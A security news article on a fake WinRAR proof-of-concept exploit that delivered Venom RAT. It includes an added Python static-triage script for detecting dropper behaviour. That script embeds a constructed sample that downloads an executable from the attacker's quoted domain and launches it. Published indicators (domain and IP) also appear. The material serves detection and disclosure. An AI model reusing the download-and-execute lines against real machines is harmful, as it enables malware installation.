2023-09-22

A “prankster” released a fake proof-of-concept (PoC) exploit for a recent WinRAR vulnerability on GitHub with the aim of infecting users who downloaded the code with the Venom RAT malware.

Where does the fake WinRAR PoC come from

“The fake PoC created to exploit this WinRAR vulnerability was based on a publicly available PoC script that exploited a SQL injection vulnerability in an application called GeoServer, identified as CVE-2023-25157,” said Palo Alto Networks Unit 42 researcher Robert Falcone.

Although fake PoCs have become a well-documented tactic in the cybersecurity landscape, Palo Alto Networks suspected that the attackers were opportunistically trying to target other criminals who may be adding the latest vulnerabilities to their arsenal.

The GitHub account that hosted the repository, whalersplonk, is no longer accessible. The PoC is believed to have been uploaded on August 21, 2023, four days after the vulnerability was made public.

CVE-2023-40477 concerns an improper validation flaw in the WinRAR utility that could be exploited to achieve remote code execution (RCE) on Windows systems. The developers addressed it last month in WinRAR version 6.23, along with another actively exploited flaw tracked as CVE-2023-38831.

How this fake WinRAR proof-of-concept is built at the code level

An analysis of the repository reveals a Python script and a video, streamed on GitHub, demonstrating how to use the exploit. Before the whalersplonk account was deleted, the video attracted a total of 121 views.

Instead of executing the PoC, the Python script contacts a remote server (checkblacklistwords[.]eu) to download an executable called Windows.Gaming.Preview.exe, which is a variant of Venom RAT and has the ability to list running processes and receive commands from a server controlled by the attacker (94.156.253[.]109).
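The dropper pattern just described (a "PoC" that fetches a remote executable and launches it instead of touching the target software) can be spotted by static triage before anyone runs the script. The following is an added example, not code from the article or from Unit 42: it walks a Python file's AST, flags network fetches, process launches, dynamic-code tricks and executable file names, and also matches the two indicators quoted in the article. The two embedded scripts are constructed samples that mimic the behaviour the article describes; they are never executed, only parsed.

```python
"""Static triage of a purported Python PoC before it is run (added example)."""
import ast
import re

# Indicators quoted in the article, refanged so plain substring matching works.
KNOWN_IOCS = ("checkblacklistwords.eu", "94.156.253.109")

NETWORK_MODULES = ("urllib", "requests", "socket", "http.client")
EXEC_PREFIXES = ("subprocess.", "os.system", "os.popen", "os.startfile", "os.exec")
DYNAMIC_CODE = ("exec", "eval", "base64.b64decode", "zlib.decompress", "marshal.loads")
EXECUTABLE_RE = re.compile(r"\.(exe|dll|scr|bat|cmd|ps1)\b", re.I)
URL_RE = re.compile(r"https?://", re.I)


def _dotted(node):
    """Rebuild 'a.b.c' from an Attribute/Name chain; '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def triage(source: str) -> dict:
    """Collect downloader/dropper indicators from a script without executing it."""
    f = {"ioc": [], "network": [], "exec": [], "dynamic": [], "exe_refs": [], "urls": []}
    refanged = source.replace("[.]", ".")
    f["ioc"] = [i for i in KNOWN_IOCS if i in refanged]
    tree = ast.parse(refanged)  # a SyntaxError here is itself worth a look
    net_names = set()  # names pulled in via "from urllib.request import urlretrieve"
    for node in ast.walk(tree):
        if isinstance(node, ast.ImportFrom) and node.module and node.module.startswith(NETWORK_MODULES):
            net_names.update(a.asname or a.name for a in node.names)
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in net_names or name.startswith(tuple(m + "." for m in NETWORK_MODULES)):
                f["network"].append((node.lineno, name))
            elif name.startswith(EXEC_PREFIXES):
                f["exec"].append((node.lineno, name))
            elif name in DYNAMIC_CODE:
                f["dynamic"].append((node.lineno, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if URL_RE.search(node.value):
                f["urls"].append((node.lineno, node.value))
            if EXECUTABLE_RE.search(node.value):
                f["exe_refs"].append((node.lineno, node.value))
    return f


def verdict(f: dict) -> str:
    """Turn the raw findings into a one-line triage result."""
    if f["ioc"]:
        return "malicious: matches published indicators"
    if f["network"] and f["exec"]:
        return "suspicious: fetches remote content and launches a process"
    if f["exec"] and (f["dynamic"] or f["exe_refs"]):
        return "suspicious: executes decoded or dropped content"
    return "no dropper pattern found"


# Constructed sample mimicking the fake PoC's behaviour (not the real script).
SAMPLE_FAKE_POC = '''
import sys, urllib.request, subprocess
def exploit(target):
    print("[*] Building malicious archive for", target)
    urllib.request.urlretrieve("http://checkblacklistwords[.]eu/Windows.Gaming.Preview.exe",
                               "Windows.Gaming.Preview.exe")
    subprocess.Popen(["Windows.Gaming.Preview.exe"])
exploit(sys.argv[1] if len(sys.argv) > 1 else "test.rar")
'''

# Constructed benign sample: builds a local archive and never talks to the network.
SAMPLE_BENIGN = '''
import zipfile
def build(path):
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("readme.txt", "hello")
'''

if __name__ == "__main__":
    for label, src in (("constructed fake PoC", SAMPLE_FAKE_POC), ("constructed benign script", SAMPLE_BENIGN)):
        findings = triage(src)
        print(f"{label}: {verdict(findings)}")
        for key, hits in findings.items():
            if hits:
                print(f"  {key}: {hits}")
```

The heuristics are deliberately coarse: a genuine PoC for a file-format bug has no reason to fetch a URL and spawn the download, so the combination of a network call and a process launch is the signal, while any single hit is only a prompt to read the code more carefully.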

A closer look at the attack infrastructure shows that the threat actor created the checkblacklistwords[.]eu domain at least 10 days before the flaw was publicly disclosed and then quickly exploited the severity of the bug to attract potential victims.

“An attacker [of unknown origin] attempted to compromise individuals by releasing a fake PoC after the vulnerability was publicly announced, in order to exploit a highly sought-after RCE vulnerability in WinRAR to compromise others,” Falcone said, adding: “This PoC is fake and does not exploit the WinRAR vulnerability, suggesting that the actor attempted to exploit a highly sought-after RCE in WinRAR to compromise others.”

